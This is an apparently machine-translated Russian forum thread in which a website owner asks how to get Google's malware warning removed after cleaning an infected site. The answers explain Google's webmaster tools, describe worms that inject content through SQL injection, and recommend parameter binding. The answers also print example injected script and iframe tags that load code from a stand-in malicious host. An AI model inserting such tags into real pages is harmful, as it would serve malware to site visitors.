Назад | Перейти на главную страницу

Мой веб-сайт заражен, я восстановил резервную копию незараженных файлов, сколько времени потребуется, чтобы снять отметку с отметки об опасности?

Мой веб-сайт www.sagamountain.com недавно был заражен распространителем вредоносного ПО (по крайней мере, я так думаю).

Я удалил весь внешний контент, рекламу Google, чат со светлячками и т. Д.

Я загрузил резервную копию несколько недель назад, когда не было проблем.

Я залатал дыру SQL-инъекции.

Теперь, сколько времени потребуется, чтобы снять с него отметку об опасности? Где я могу связаться с Google?

Я не уверен, что это подходящее место для публикации, но, поскольку это могла быть проблема с сервером, я тоже могу это сделать. Могут ли сайты внедрять код base64 через вирус на весь сервер или только через sql-инъекцию?

Спасибо за помощь, вирусы меня пугают.

Есть ли онлайн-сканер вирусов, который может просканировать мою страницу и сказать мне, что не так?

Что касается Google, просмотрите их страницу о сайтах, зараженных вредоносным ПО.

Мой сайт и Google ›Мой сайт взломали

Вы захотите войти в свой инструменты для веб-мастеров страницу, добавьте свой сайт в свою учетную запись и выполните шаги проверки. После этого вы получите доступ для выполнения таких действий, как запрос на проверку вашего сайта на предмет заражения.

В наши дни это относительно распространенная проблема. Многие черви пытаются проникнуть в код вашего сервера с помощью SQL-инъекции или изменения локального содержимого .html, которое затем загружается на веб-сервер. Обычно они пытаются поставить:

<script src='http://badwebsite.ru/blah.js'></script>

или

<iframe src='http://badwebsite.ru/blah.html' />

на исходную страницу с помощью SQL-инъекции или модификации исходного кода.

Насколько мне известно, черви модифицируют векторы своих атак с помощью механизмов обфускации JavaScript или аналогичных средств, и их сложно сканировать.

Эти атаки стали возможными благодаря двум недавним крупным удаленным запускам кода:

  • Adobe Flash JavaScript эксплойты, которые позволяют создавать Flash-объект с помощью примерно 15 КБ произвольного кода.
  • Эксплойт к расширению Windows Presentation Framework в Firefox, установленному Microsoft .NET 3.5 в системах Windows.

Оба эти фактора представляют собой огромную угрозу безопасности.

По возможности следует использовать привязку параметров при разработке веб-приложений, чтобы избежать атак с использованием SQL-инъекций.